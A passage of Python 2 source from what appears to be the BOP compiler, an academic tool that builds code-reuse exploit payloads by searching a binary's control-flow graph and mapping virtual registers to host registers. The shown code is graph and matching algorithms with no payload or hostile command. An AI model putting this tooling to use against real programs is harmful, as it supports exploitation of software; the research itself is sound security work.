            if len(filter(lambda n : n not in ADDR2NODE, nxt)): 
                raise Exception('Node is not a valid address')

            self.__d.add_nodes_from( nxt )          # add nodes for the next level

            # fully connect nodes from current to the next level (quadratic complexity)
            for c in cur:                           # for each node in current level


                print '-------------------------------------'
                path = cfg.shortest_path(c, nxt)    # find paths to all nodes in the next level
                print '======================================='
                for n in range(len(nxt)):           # for each node in the next level
                    # add an edge with cost their distance in CFG (or INF if edge does not exist)

                    # TODO: remove cheating (backdoor)
                    if c == entry: 
                        self.__d.add_edge(c, nxt[n], weight=7)                  

                    else:
                        self.__d.add_edge(c, nxt[n], weight=path[n][0] if path[n][0] >= 0 \
                                                                       else INFINITY)

            cur = nxt                               # move 1 level deeper
        '''


        # because we don't care in which node we'll end up we add an additional sink node
        # sink node is connected with all nodes in the last level
        
        # self.__d.add_node( _SINK_NODE )               # add sink node
        # self.__d.add_edges_from( zip(nxt, [_SINK_NODE]*len(nxt)), weight=1 )

        # at this point we have built delta graph

        # print self.__d.edges(data=True)

        dbg_prnt(DBG_LVL_1, "Delta graph created")
        dbg_prnt(DBG_LVL_3, "Edges:")

        for a,b,c in self.__d.edges(data=True): 
            if c['weight'] == INFINITY:                       # skip infinity edges
                continue

            dbg_prnt(DBG_LVL_3, "%d:%Xh -> %d:%Xh = %s" % (a[0], a[1], b[0], b[1], str(c)))


        self.__G   = self.__d
        self.graph = self.__d

        # for n in self.__G.nodes():
        #     print hex(n)
        # exit()
        

    # ---------------------------------------------------------------------------------------------
    # k_min_induced_subgraphs(): Find the K minimum k-induced subgraphs. Unfortunately we mess with
    #       NP-hardness here. Even worse the problem can't be even approximated (see proof).
    #       Therefore, a brute force is the only solution here. So, we calculate all the induced
    #       subgraphs (that contain exactly 1 accepted block from each statement), and keep track
    #       of the K minimum solutions (we use a max-heap to optimize that).
    # 
    #
    #       NP-hardness proof:
    #           TODO: Copy proof from here (and explain why there are no approximations):
    #           https://cs.stackexchange.com/questions/85077/minimum-weight-k-induced-subgraph
    #
    #
    # :Arg K: The number of traces to search for (up to K)
    # :Ret: Function is a generator and works exactly as super.k_shortest_paths(): Each time it
    #       returns a tuple (tw, Hk) which is the minimum induced subgraph Hk of G, with a total
    #       weight of tw. If such a subgraph does not exists, function return (-1, empty_graph).
    #
    def k_min_induced_subgraphs( self, K ):
        self.__k = K                                    # number of induced subgraphs

        # when delta graph is flat, a k shortest path approach is sufficient:
        #
        # return super(self.__class__, self).k_shortest_paths(self.__entry, _SINK_NODE, K)

    
        # list with number of accepted blocks from each statement
        self.__bound = [len(x) for _, x in self.__node_groups]
        self.__uid   = [y      for y, _ in self.__node_groups]

        self.__heap = []
        heapq._heapify_max(self.__heap)             # create a max-heap


        dbg_prnt(DBG_LVL_3, "Enumerating all induced subgraphs...")

        
        # build the reverse adjacency list
        self.__radj = { }

        for a, b in self.__adj.iteritems():
            for c in b:
                self.__radj.setdefault(c, []).append(a)


        dbg_arb(DBG_LVL_3, "Adjacency List:", self.__adj)
        dbg_arb(DBG_LVL_3, "Reverse Adjacency List:", self.__radj)

        # enumerate all induced subgraphs
        self.__inc_ctr = 0
        self.__enum_induced_subgraphs(1, [(0, self.__entry)] )
        

        dbg_prnt(DBG_LVL_3, "Done. %d induced subgraphs found." % len(self.__heap))


        inv  = []
        none = True

        while len(self.__heap):                     # for each minimum induced subgraph
            obj = heapq.heappop(self.__heap)
            inv.append(obj)                         # move objects from heap to a list


        for obj in reversed(inv):                   # yield objects in reverse order
            # print 'Inverse', obj.tw, obj.Hk.edges(data=True)

            if obj.tw != INFINITY:
                none = False
                yield obj.tw, obj.Hk


        if none:                                    # if you haven't return anything
            yield -1, nx.empty_graph(create_using=nx.DiGraph())


    # ---------------------------------------------------------------------------------------------
    # __enum_paths(): More recursion! This guy is the assistant for flatten_graph().
    #
    # :Arg curr: Current node
    # :Arg graph: The induced subgraph
    # :Arg P: Current path
    # :Arg __visited: Current set of visited nodes
    # :Arg F: Lambda function to encode nodes in P (needed for pretty-print situations)
    # :Ret: P!
    #
    def __enum_paths( self, curr, graph, P, __visited, F=lambda x: x ):
        if curr in __visited:
            return P


        # __visited.add(curr)

        if len(graph.neighbors(curr)) == 1:
            for n in graph.neighbors(curr):              
                P = self.__enum_paths(n, graph, P+[(curr[0], F(curr[1]), F(n[1]))], __visited+[curr], F)
                # P.append((curr, n))
                

        elif len(graph.neighbors(curr)) == 2:
            n1, n2 = graph.neighbors(curr)
            
            # print n1, n2, self.__adj[curr[0]] 

            Q = self.__enum_paths(n1, graph, [(curr[0], F(curr[1]), F(n1[1]))], __visited+[curr], F)
            R = self.__enum_paths(n2, graph, [(curr[0], F(curr[1]), F(n2[1]))], __visited+[curr], F)

            # print 'Q IS', Q
            # print 'R IS', R

            # check if Q or R is the "taken" branch
            # in adj the taken branch is always first
            if self.__adj[curr[0]] == [n1[0], n2[0]]:
                P.append([Q, R])                    # n1 is the "taken" branch
            else:
                P.append([R, Q])                    # n2 is the "taken" branch

        else:
            return P + [(curr[0], F(curr[1]), F(curr[1]))]

        # print 'FINAL P', P
        return P


    # ---------------------------------------------------------------------------------------------
    # flatten_graph(): Flatten the induced subgraph. Enumerate all paths and store them as 
    #   a tree of lists. 
    #
    # :Arg graph: Current induced subgraph
    # :Ret:
    #
    def flatten_graph( self, graph ):
        '''
        # self.__stack = ['e']
        self.__visited = set()

        graph = nx.DiGraph()
    
        graph.add_nodes_from( ['e', 'A2', 'A3', 'A4', 'A5', 'A6', 'A7'] )

        graph.add_edge( 'e',  'A2', weight=0)
        graph.add_edge( 'A2', 'A3', weight=30)
        graph.add_edge( 'A2', 'A4', weight=2)
        graph.add_edge( 'A3', 'A5', weight=4)
        graph.add_edge( 'A4', 'A7', weight=1)
        graph.add_edge( 'A5', 'e',  weight=2)
        graph.add_edge( 'A5', 'A6', weight=3)
        graph.add_edge( 'A6', 'A7', weight=3)
        graph.add_edge( 'A7', 'A2', weight=2)

        P = self.__enum_paths('e', graph, [], [])

        # print 'P', P
        '''        
        self.__visited = set()

        P      = self.__enum_paths((0, self.__entry), graph, [], [])
        pretty = self.__enum_paths((0, self.__entry), graph, [], [], lambda x: '%x' % x)
                
        # TODO: Distinguish between taken/not taken brances
                
        return P, pretty

# -------------------------------------------------------------------------------------------------


================================================
FILE: source/map.py
================================================
#!/usr/bin/env python2
# -------------------------------------------------------------------------------------------------
#
#    ,ggggggggggg,     _,gggggg,_      ,ggggggggggg,      ,gggg,  
#   dP"""88""""""Y8, ,d8P""d8P"Y8b,   dP"""88""""""Y8,  ,88"""Y8b,
#   Yb,  88      `8b,d8'   Y8   "8b,dPYb,  88      `8b d8"     `Y8
#    `"  88      ,8Pd8'    `Ybaaad88P' `"  88      ,8Pd8'   8b  d8
#        88aaaad8P" 8P       `""""Y8       88aaaad8P",8I    "Y88P'
#        88""""Y8ba 8b            d8       88"""""   I8'          
#        88      `8bY8,          ,8P       88        d8           
#        88      ,8P`Y8,        ,8P'       88        Y8,          
#        88_____,d8' `Y8b,,__,,d8P'        88        `Yba,,_____, 
#       88888888P"     `"Y8888P"'          88          `"Y8888888 
#
#   The Block Oriented Programming (BOP) Compiler - v2.1
#
#
# Kyriakos Ispoglou (ispo) - ispo@purdue.edu
# PURDUE University, Fall 2016-18
# -------------------------------------------------------------------------------------------------
#
#
# map.py:
#
# This module is responsible for mapping IR's virtual registers and variables, to host registers 
# and addresses of the target binary. During graph marking, we create a bipartite graph that
# contains the virtual registers on the one set and the host registers on the other. The edges 
# denote potential mappings. Furthermore, when a variable is passed as a reference to a virtual
# register, we encode that mapping (variable <-> address) as weight of the corresponding edege.
#
# Finding one such mapping doesn't imply that trace search algorithm will find a solution. Hence,
# we need to go back, find another mapping and try again. This creates the need to enumerate *all*
# possible mappings. So for each register mapping, we extract the edge weights and we enumerate 
# *all* possible variable mappings. We use algorithm at [1] to make enumeration efficient.
#
# The time complexity for register mapping is O(1), because the register set is constant (8 virtual
# registers and 16 host registers). For the variable mappings the time complexity is:
# O(|E|*|V|^0.5 + |N|*A), where A = total number of possible matchings.
#
#
# [1]. Uno, Takeaki. "Algorithms for enumerating all perfect, maximum and maximal matchings in 
#       bipartite graphs." Algorithms and Computation (1997): 92-101.  
#
# -------------------------------------------------------------------------------------------------
from coreutils import *

import networkx as nx
import __builtin__                                  # to use the built-in map()
import copy
import re


# -------------------------------------------------------------------------------------------------
# _match: This class finds all maximum matchings in a given bipartite undirected graph by using
#   the algorithm as described in [1]. Note that the optimization of trimming unnecessary edges 
#   from D(G,M) is not implemented, as this class works with small graphs.
#
#   This class uses a recursion to enumerate all matchings. So, every time a matching is found, a
#   callback is invoked to process the matching. If the callback want to stop getting matchings, 
#   it should return a negative value.
#
class _match( object ): 
    ''' ======================================================================================= '''
    '''                                   INTERNAL FUNCTIONS                                    '''
    ''' ======================================================================================= '''

    # ---------------------------------------------------------------------------------------------
    # __D(): Generate directed graph D(G,M) as defined in the original paper. Let V1 = __r0, __r1, 
    #       etc. (host registers) and V2 = rax, rdx, rcx, etc. (virtual registers), if we're in
    #       "register" mode, and Let V1 = $loc_2, etc. (variables) and V2 = 0x7ffff.... etc. 
    #       (addresses) if we're in "variable" mode.
    #
    # :Arg G: Undirected graph to work on.
    # :Arg M: A maximum matching, as a list of tuples.
    # :Ret: D(G,M) (directed).
    #   
    def __D( self, G, M ):
        DG = nx.DiGraph()                           # create an empty directed graph        
        DG.add_nodes_from(G.nodes())                # D(G,M) has the same vertices with G
        DG.add_edges_from( M )                      # edges from M are directed from V1 to V2 in D
        
        for e in G.edges():                         # for each edge in G
            if self.__opposite(e[0]):               # if edge is (host, virtual) or (addr, var)
                e = (e[1], e[0])                    # swap it to (virtual, host) or (var, addr)
                        
            # print '!', e, M 
            if not e in M:                          # if edge not in M
                DG.add_edge(e[1], e[0])             # add edge in reverse direction

        return DG                                   # return D(G,M)


    # ---------------------------------------------------------------------------------------------
    # __matchings_iter(): Given a graph G and a matching M, find another matching M' != M. This
    #       is a recursive function which means that, it will find all matchings. If the callback
    #       function wants to stop enumerations for some reason, all it has to do, is to return a 
    #       negative value and __matchings_iter() will stop producing more matchings.
    #
    # :Arg G: Graph to work on
    # :Arg M: A list of tuples, containing a maximum matching
    # :Arg D: The special graph D(G,M)
    # :Ret: Under normal execution, function returns 0. If callback returns -1 at some point,
    #   then function enters exit mode, which returns always -1.
    #
    def __matchings_iter( self, G, M, D ):  
        if G.number_of_edges == 0:                  # if G has no edges,
            return 0                                # stop (normal mode)
        
        try:                                        # look for a cycle in D(G,M)
            cycle = nx.algorithms.find_cycle(D, orientation='original') 

            ''' --------------------------------------------------------------------- '''
            ''' we have found a cycle                                                 '''
            ''' --------------------------------------------------------------------- '''

            # exchange matching edges with other edges in cycle
            Mprime  = [(e[1], e[0]) for e in cycle if e not in M] 
            Mprime += [e for e in M if e not in cycle]

            # remove tuples from bitvector strings
            Mprime = __builtin__.map(lambda x : (x[0],x[1][0]) if isinstance(x[1], tuple)   
                                                               else x, Mprime)


            # M' (Mprime) is a new maximum matching. Invoke callback
            if self.__callback( sorted(Mprime, key=lambda e: e[0]) ) < 0:
                return -1                           # if callback wants to stop, stop
            

            # pick an edge e that is both in M and cycle (always exists)
            e = [e for e in cycle if e in M][0]

        except nx.exception.NetworkXNoCycle:        # D(G,M) has no cycles
            ''' --------------------------------------------------------------------- '''
            ''' no cycle. Look for a feasible path of length 2                        '''
            ''' --------------------------------------------------------------------- '''

            feasible = None

            # for each uncovered node in D(G,M)
            # b/c we're dealing with max matchings, uncovered nodes, are host registers
            for u in list(set(D.nodes()) - set([vtx for e in M for vtx in e])):

                # for each possible target vertex (different from source)
                for v in [v for v in D.nodes() if u != v]:
                    # If a vertex is uncovered, then (path[0], path[1]) is not in M. Therefore,
                    # (path[1], path[2]) must be in M due to the construction of D(G,M). So, if
                    # the 2nd edge is in M, the other endpoint won't have any other edges in M
                    # b/c current matching is maximum and there's already one edge of M adjacent
                    # to that endpoint. This makes any length 2 path in D(G,M) starting from an
                    # uncovered vertex, feasible.

                    # try to find all simple paths of length *exactly* 2 (3 vertices)
                    for path in nx.all_simple_paths(D, u, v, cutoff=2):
                        if len(path) != 3: continue                 
                        feasible = path             # we got a feasible path
                        break

                    if feasible: break              # break both loops
                if feasible: break                  # break both loops

            if not feasible: return 0               # if no feasible path, stop
            
            # get an edge e which is in feasible path but not in M
            e = (feasible[1], feasible[0]) if   (feasible[1], feasible[0]) not in M \
                                           else (feasible[1], feasible[2]) 
                
            # create a new matching
            Mprime = [m for m in M if m[0] != e[0] ] + [e]


            # remove tuples from bitvector strings
            Mprime = __builtin__.map(lambda x : (x[0],x[1][0]) if isinstance(x[1], tuple)   
                                                               else x, Mprime)


            # M' (Mprime) is a new maximum matching. Invoke callback
            if self.__callback( sorted(Mprime, key=lambda e: e[0]) ) < 0:
                return -1                           # if callback wants to stop, stop

            Mprime, M = M, Mprime                   # swap matchings (important!)

        ''' ------------------------------------------------------------------------- '''
        ''' common code for both cases                                                '''
        ''' ------------------------------------------------------------------------- '''

        # generate G+(e)
        Gplus = copy.deepcopy(G)                    # get a hardcopy of G       
        Gplus.remove_node( e[0] )                   # drop e and e's endpoints
        Gplus.remove_node( e[1] )                   # along with all adjacent edges 
        
        # generate G-(e)
        Gminus = copy.deepcopy(G)                   # get a hardcopy of G
        Gminus.remove_edge( e[0], e[1] )            # drop e

        # OPTIONAL: As an optimization, we can trim unnecessary edges from D(G,M)

        # recursively find matchings for G+(e) and G-(e)
        if self.__matchings_iter(Gplus, M, self.__D(Gplus, [x for x in M if x != e]) ) < 0:
            del Gplus, Gminus, D                    # release allocated objects
            return -1                               # quickly return from recursions

        if self.__matchings_iter(Gminus, Mprime, self.__D(Gminus, Mprime)) < 0:
            del Gplus, Gminus, D                    # release allocated objects
            return -1                               # quickly return from recursions


        del Gplus, Gminus, D                        # release allocated objects
        return 0                                    # normal return


    # ---------------------------------------------------------------------------------------------
    # __max_matchings_recursion(): Recursively find all maximum matchings for *registers*. This is
    #       an exponential time approach, as tries all possible combinations. However, it's useful 
    #       to evaluate the correctness of the enum_max_matchings() (debug only).
    #
    # :Arg G: Graph to work on
    # :Arg depth: Current recursion depth
    # :Arg M: Current matching
    # :Ret: None.
    #
    def __max_matchings_recursion( self, G, depth, M ):
        if depth >= self.__n:                       # reach max depth?
            self.__callback(M)                      # invoke callback and stop
            return

        curr = '__r%d' % depth                      # make current virtual register

        for n in G.neighbors( curr ):               # for each adjacent vertex
            # code is for debug, so keep it simple: Instead of keeping track of
            # edges and nodes you remove, just copy the whole graph
            NG = copy.deepcopy(G)

            NG.remove_node( curr )                  # drop nodes that make a pair
            NG.remove_node( n )

            # move on the next matching
            self.__max_matchings_recursion(NG, depth+1, M+[(curr, n)])
            
            del NG                                  # new graph not needed anymore


    # ---------------------------------------------------------------------------------------------

    ''' ======================================================================================= '''
    '''                                     CLASS INTERFACE                                     '''
    ''' ======================================================================================= '''

    # ---------------------------------------------------------------------------------------------
    # __init__(): Class constructor.
    #
    # :Arg graph: Graph to work on
    # :Arg mode: Working mode (register/variable)
    #
    def __init__( self, graph, mode ):  
        if not nx.is_bipartite(graph):              # check if graph is bipartite
            raise Exception('Not a bipartite graph!')
            
        if nx.is_directed(graph):                   # check if graph is undirected
            raise Exception('Not an undirected graph!')

        self.__G = copy.deepcopy(graph)             # get graph


        # drop nodes without edges
        for n in [n for n in graph.nodes() if graph.degree(n) == 0]:
            self.__G.remove_node(n)                 # remove node 
        

        # opposite() is used to check the orientation of an edge
        # check mode and set lambda accordingly.
        try:                                        
            self.__mode, self.__opposite = mode, {
                'register' : lambda key : not re.match(r'^__r.$', key),
                'variable' : lambda key : isinstance(key, long) or isinstance(key, tuple)
            }[ mode ]
        except KeyError: 
            fatal("Invalid mode '%s'" % mode )      # invalid mode


    # ---------------------------------------------------------------------------------------------
    # __del__(): Class destructor.
    #
    def __del__( self ):
        del self.__G                                # release graph


    # ---------------------------------------------------------------------------------------------
    # enum_max_matchings(): Enumerate all maximum matchings.
    #
    # :Arg callback: A callback function to be invoked every time a new matching is found
    # :Arg n: Size of max matching (optional)
    # :Ret: None.
    #
    def enum_max_matchings( self, callback, n=-1 ):
        self.__callback = callback                  # save callback function

        # find a maximum matching in M      
        M = nx.bipartite.maximum_matching(self.__G)

        # M is a dictionary like: {'__r0': 'rdx', '__r1': 'rcx', '__r2': 'rax', 'rdx': '__r0', 
        # 'rcx': '__r1', 'rax': '__r2'}. Each edge it appears both in forward and reverse 
        # direction. So, we only keep edges in one direction (V1 -> V2)
        #
        # don't use .iteritems() (dictionary is modifed on the fly)
        for key, val in M.items():
            if self.__opposite(key):                # drop (host, virtual) (or (addr, var)) edges 
                del M[key]

        M = M.items()                               # cast dictionary to list (for convenience)


        # To get the number of virtual registers in the graph we can't use this:
        #   virt, _ = nx.bipartite.sets(self.__G) 
        # 
        # This is because bipartite.sets() algorithmically find the sets. So, if a node has no
        # edges it will classified in the 2nd set, even if it has attribute bipartite = 0. To
        # fix that we can either drop nodes with no edges, or to use an alternative:
        virt = [u for u, b in nx.get_node_attributes(self.__G,'bipartite').iteritems() if not b]


        # check if matching cover all virtual registers (or variables)
        # if not an explicit size is given, extract size from bipartite sets        
        if n > 0 and len(M) < n or n < 0 and len(M) < len(virt):                    
            dbg_arb(DBG_LVL_3, "There are no maximum matchings for", self.__G.edges())
            return 0                                # abort


        # TODO: M can be:
        #   [('__r0', 'r14'), ('__r1', 'r15')]
        #   [('foo', ('<BV64 0x7ffffffffff0020>',))]
        #
        # Because bitvectors are strings at this point, no exceptions are thrown

        # remove tuples from bitvector strings
        M = __builtin__.map(lambda x : (x[0],x[1][0]) if isinstance(x[1], tuple) else x, M)

        # print 'M IS ', M

        # M is a the 1st maximum matching. Invoke callback
        # if self.__callback( sorted(M, key=lambda e: e[0]) ) < 0:
        if self.__callback( M ) < 0:
            return -1                               # if callback wants to stop, stop

        # OPTIONAL: As an optimization, we can trim unnecessary edges from D(G,M)

        # find all other maximum matchings
        return self.__matchings_iter(self.__G, M, self.__D(self.__G, M))    


    # ---------------------------------------------------------------------------------------------
    # enum_max_matchings_bf(): Enumerate all maximum matchings using brute force. This is simply
    #       a wrapper of __max_matchings_recursion() (register only (DEB)).
    #
    # :Arg callback: A callback function to be invoked every time a new matching is found
    # :Arg n: Size of max matching
    # :Ret: None.
    #
    def enum_max_matchings_bf( self, callback, n ):
        self.__callback = callback                  # save callback function
        self.__n        = n                         # size of max matching

        if self.__mode != 'register':               # this only available in register mode
            fatal("Brute force matching is not supported in variable mode")

        self.__max_matchings_recursion(self.__G, 0, [])


# -------------------------------------------------------------------------------------------------


# -------------------------------------------------------------------------------------------------
# map: This class finds all matchings between virtual and host registers and between variables and 
#   addresses. This is mostly a wrapper of _match class. 
#
class map( object ):
    ''' ======================================================================================= '''
    '''                                   INTERNAL FUNCTIONS                                    '''
    ''' ======================================================================================= '''

    # ---------------------------------------------------------------------------------------------
    # __intrl_callback_var(): This callback is invoked every time that a new variable matching is
    #       found. This function is implicitly invoked by __intrl_callback_reg() which means that
    #       at this point there is already a register mapping. This function is actually a wrapper
    #       for the original callback of enum_mappings().
    #
    # :Arg match: A new matching, as a list of tuples
    # :Ret: If function wants to be invoked again with a new matching, it should return a non
    #   negative value. Otherwise returns 0.
    #
    def __intrl_callback_var( self, match ):

        # invoke the real callback
        return self.__callback(self.__reg_match, match)
        

    # ---------------------------------------------------------------------------------------------
    # __intrl_callback_reg(): This callback is invoked every time that a new register matching is
    #       found. At this point we have a maximum matching for registers (register mapping). 
    #       Given this matching, create the variable graph and enumerate all possible variable 
    #       matchings.
    #
    # :Arg match: A new matching, as a list of tuples
    # :Ret: If function wants to be invoked again with a new matching, it should return a non
    #   negative value. Otherwise returns 0.
    #
    def __intrl_callback_reg( self, match ):
        self.__reg_match = match                    # save matching for later

        vG = nx.Graph()                             # variable graph        
        
        for u, v in match:                          # for each edge in register mapping
            try:
                for a,b in self.__g.get_edge_data(u, v)['var']:
                    vG.add_node(a, bipartite=0)
                    vG.add_node(b, bipartite=1)
                    vG.add_edge(a, b)
            except KeyError: pass                   # edge has no weights
        
        match = _match(vG, 'variable')              # create a 2nd matching object


        # enumerate all variable matchings, using an 2nd internal callback
        if match.enum_max_matchings(self.__intrl_callback_var, self.__nvars) < 0:           
            del match                               # free object   
            return -1                               # no more matchings

        del match                                   # free object
        return 0                                    # normal return


    # ---------------------------------------------------------------------------------------------

    ''' ======================================================================================= '''
    '''                                     CLASS INTERFACE                                     '''
    ''' ======================================================================================= '''

    # ---------------------------------------------------------------------------------------------
    # __init__(): Class constructor.
    #
    # :Arg graph: Graph to work on
    # :Arg nregs: Total number of virtual registers
    # :Arg nvars: Total number of variables
    #
    def __init__( self, graph, nregs, nvars ):
        self.__g     = graph                        # store arguments
        self.__nregs = nregs
        self.__nvars = nvars


    # ---------------------------------------------------------------------------------------------
    # enum_mappings(): Enumerate all possible register and variable mappings.
    #
    # :Arg callback: A callback function to be invoked, every time a mapping is found
    # :Ret: None.
    #
    def enum_mappings( self, callback ):        
        dbg_prnt(DBG_LVL_1, "Enumerating all mappings between virtual and hardware registers")
        dbg_prnt(DBG_LVL_1, "\tand all mappings between variables and addresses...")

        self.__callback = callback                  # get callback

        try:        
            match = _match(self.__g, 'register')    # create a matching object
        except Exception: return                    # catch exception

        # enumerate all register matchings, using an internal callback
        ret = match.enum_max_matchings(self.__intrl_callback_reg, self.__nregs)

        del match                                   # free object
        
        return ret

# -------------------------------------------------------------------------------------------------
'''
if __name__ == '__main__':                          # DEBUG ONLY
    G = nx.Graph()
    
    G.add_nodes_from(['__r0', '__r1', '__r2', '__r3'], bipartite=0)
    G.add_nodes_from(['rax', 'rdx', 'rcx', 'rbx', 'rsi', 'rdi'], bipartite=1)   
    
    G.add_edges_from([ 
        ('__r0', 'rax'), ('__r0', 'rcx'), ('__r0', 'rsi'),
        #('__r1', 'rax'), ('__r1', 'rdx'), ('__r1', 'rcx'), ('__r1', 'rbx'),
        ('__r2', 'rcx'), ('__r2', 'rdi'), ('__r2', 'rsi'),
        ('__r3', 'rdx'), ('__r3', 'rdi'), ('__r3', 'rsi')

    ])  
    
#   G.add_nodes_from(['$loc_2'], bipartite=0)
#   G.add_nodes_from([576460752303358032L, 576460752303358048L, 576460752303358064L], bipartite=1)  
#
#   G.add_edges_from([ 
#       ('$loc2', 576460752303358032L),
#       ('$loc2', 576460752303358048L),
#       ('$loc2', 576460752303358064L)
#   ])
    
    def callback( m ):
        print 'Got matching: ', m
        return 0                                    # must return an non negative value

    m = _match( G, 'register' )
    m.enum_max_matchings( callback )

    print '----------------------------------------'
    m.enum_max_matchings_bf( callback, 4 )
'''
# -------------------------------------------------------------------------------------------------


================================================
FILE: source/mark.py
================================================
#!/usr/bin/env python2
# -------------------------------------------------------------------------------------------------
#
#    ,ggggggggggg,     _,gggggg,_      ,ggggggggggg,      ,gggg,  
#   dP"""88""""""Y8, ,d8P""d8P"Y8b,   dP"""88""""""Y8,  ,88"""Y8b,
#   Yb,  88      `8b,d8'   Y8   "8b,dPYb,  88      `8b d8"     `Y8
#    `"  88      ,8Pd8'    `Ybaaad88P' `"  88      ,8Pd8'   8b  d8
#        88aaaad8P" 8P       `""""Y8       88aaaad8P",8I    "Y88P'
#        88""""Y8ba 8b            d8       88"""""   I8'          
#        88      `8bY8,          ,8P       88        d8           
#        88      ,8P`Y8,        ,8P'       88        Y8,          
#        88_____,d8' `Y8b,,__,,d8P'        88        `Yba,,_____, 
#       88888888P"     `"Y8888P"'          88          `"Y8888888 
#
#   The Block Oriented Programming (BOP) Compiler - v2.1
#
#
# Kyriakos Ispoglou (ispo) - ispo@purdue.edu
# PURDUE University, Fall 2016-18
# -------------------------------------------------------------------------------------------------
#
#
# mark.py:
#
# This module is responsible for marking the CFG. To mark a basic block, this has to be abstracted
# first (otherwise marking process is still possible but very compilcated). A basic block can be
# marked as "candidate", "accepted", or "clobbering". Below are the preconditions for each 
# marking type:
#
#   candidate  : A basic block fulfils the requirements to execute one (or more) SPL statements,
#                but there is not enough information to determine whether it can truly execute
#                that statement(s).
#
#   accepted   : A basic block that can truly be used to execute one (or more) SPL statements.
#
#   clobbering : A basic block that "clobbers" (i.e., interferes) with the execution of an 
#                accepted block and therefore needs to be avoided.
#
#   failed     : Analysis on that basic block failed and therefore it should be treated as 
#                clobbering at all times.
#
# -------------------------------------------------------------------------------------------------
from coreutils import *
from calls     import *

import absblk as A

import angr
import claripy
import simuvex

import networkx as nx

import struct
import copy
import cPickle as pickle
import pprint
import math
import re


# -------------------------------------------------------------------------------------------------
# mark: This class is responsible for marking the CFG.
#
class mark( object ):
    ''' ======================================================================================= '''
    '''                                   INTERNAL FUNCTIONS                                    '''
    ''' ======================================================================================= '''

    # ---------------------------------------------------------------------------------------------
    # __blk_cnt(): Count the number of "functional" basic blocks in the CFG.
    #
    # :Arg avoid: A list of function names to avoid (optional)
    # :Arg which: Which basic blocks to count (default: 'all')
    # :Ret: The number of basic blocks in the CFG.
    # 
    def __blk_cnt( self, avoid=[], which='all'):     
        # ---------------------------------------------------------------------
        # Abstract method
        #
        # Count only abstracted basic blocks
        # ---------------------------------------------------------------------
        if which == 'abstract':
            return len(nx.get_node_attributes(self.__cfg.graph, 'abstr').items())

        # ---------------------------------------------------------------------
        # All method
        #
        # Count all basic blocks
        # ---------------------------------------------------------------------
        elif which == 'all':
            cnt = 0                                 # initialize counter

            for addr, func in self.__cfg.kb.functions.iteritems():
                # skip functions that are outside of the main_object, e.g.:
                #   <ExternObject Object cle##externs, maps [0x1000000:0x1008000]>,
                #   <KernelObject Object cle##kernel,  maps [0x3000000:0x3008000]>
                if addr < self.__proj.loader.main_object.min_addr or \
                   addr > self.__proj.loader.main_object.max_addr:
                        continue

                if func.name in avoid:              # you may need to exclude some functions
                    continue            
                

                for bb in func.block_addrs:         # count them 1 by 1 (len() doesn't work)
                    cnt += 1

            return cnt

        # ---------------------------------------------------------------------
        # Any other method should raise an error
        # ---------------------------------------------------------------------
        else: 
            fatal("Unknown method")


    # ---------------------------------------------------------------------------------------------
    # __blk_iter(): Iterate over basic blocks. This function is a generator over "all" basic
    #       blocks in the CFG.
    #
    # :Arg avoid: A list of function names to avoid (optional)
    # :Arg method: Iteration method (block/node/abstracted)
    # :Ret: Every time function returns with either the address of the next basic block 
    #       ('block' method), or with a tuple (node, attributes) of the next basic block in the
    #       CFG ('node' and 'abstracted' methods).
    # 
    def __blk_iter( self, avoid=[], method='block' ):
        # ---------------------------------------------------------------------
        # Block method
        #
        # Iterate over each function and for each function iterate over block
        # addresses.
        # ---------------------------------------------------------------------
        if method == 'block':
            # iterate over each function
            for addr, func in self.__cfg.kb.functions.iteritems():
                # skip functions that are outside of the main_object, e.g.:
                #   <ExternObject Object cle##externs, maps [0x1000000:0x1008000]>,
                #   <KernelObject Object cle##kernel,  maps [0x3000000:0x3008000]>
                if addr < self.__proj.loader.main_object.min_addr or \
                   addr > self.__proj.loader.main_object.max_addr:
                        continue

                if func.name in avoid:              # you may need to exclude some functions
                    dbg_prnt(DBG_LVL_3, "Skipping function '%s'!" % func.name)
                    continue            


                # iterate over basic blocks for each function (sort them to ease debugging)
                for bb in sorted(func.block_addrs):                                
                    yield bb                        # return address of the next block


        # ---------------------------------------------------------------------
        # Node method
        #
        # Iterate over all nodes in CFG directly.
        # ---------------------------------------------------------------------
        elif method == 'node':
            avoid_addr = { }                        # set of avoided functions

            # iterate over each function
            for addr, func in self.__cfg.kb.functions.iteritems():
                if func.name in avoid:
                    avoid_addr[ addr ] = 1          # mark blocks that you want to avoid


            # now iterate over nodes
            for node, attr in self.__cfg.graph.nodes_iter(data=True):
                # skip functions that are outside of the main_object, e.g.:
                #   <ExternObject Object cle##externs, maps [0x1000000:0x1008000]>,
                #   <KernelObject Object cle##kernel,  maps [0x3000000:0x3008000]>
                if node.addr < self.__proj.loader.main_object.min_addr or \
                   node.addr > self.__proj.loader.main_object.max_addr:
                        continue

                if node.addr in avoid_addr:         # if block is blacklisted,
                    continue                        # skip it

                yield node, attr                    # return tuple for that node


        # ---------------------------------------------------------------------
        # Abstract method
        #
        # Iterate over abstracted basic blcoks
        # ---------------------------------------------------------------------
        elif method == 'abstract':
            for node, attr in nx.get_node_attributes(self.__cfg.graph, 'abstr').iteritems(): 
                yield node, attr                    # return tuple for the abstracted block


        # ---------------------------------------------------------------------
        # Any other method should raise an error
        # ---------------------------------------------------------------------
        else: 
            fatal("Unknown method")


    # ---------------------------------------------------------------------------------------------
    # __reg_filter(): Apply a filter to a given hardware register. Although tt's better to apply
    #       this function on absblk, it's harder to make changes once abstractions are generated.
    #
    # :Arg reg: A register to check
    # :Ret: If filter discards register, function returns False. Otherwise it returns True.
    #
    def __reg_filter( self, reg ):
        # drop register mappings that use rsp (or rbp if configured)
        if reg == 'rsp' or reg == 'rbp' and not MAKE_RBP_SYMBOLIC:
            dbg_prnt(DBG_LVL_4, "A virtual register cannot be mapped to '%s'" % 
                                bolds(reg))

            return False                            # can't pass through the filter

        return True                                 # register not discarded


    # ---------------------------------------------------------------------------------------------
    # __imm_addr(): Check if an address dereference stays immutable during block execution.
    #       Consider the following example:
    #
    #           .text:00000000004008C0 add     eax, ebx
    #           .text:00000000004008C2 mov     cs:foo, eax
    #           .text:00000000004008C8 mov     eax, cs:foo
    #
    #       Here, although the value of eax is loaded from memory, we have no control over it, as
    #       the same memory cell is being written by another register
    #
    #
    # :Arg address: Address to check
    # :Arg abstr: The whole block abstractions
    # :Ret: If address is immutable function returns True. Otherwise it returns False.
    #
    def __imm_addr( self, address, abstr ):
        if isinstance(address, int):
            for addr, _ in abstr['conwr']:          # check concrete writes
                if addr == address:
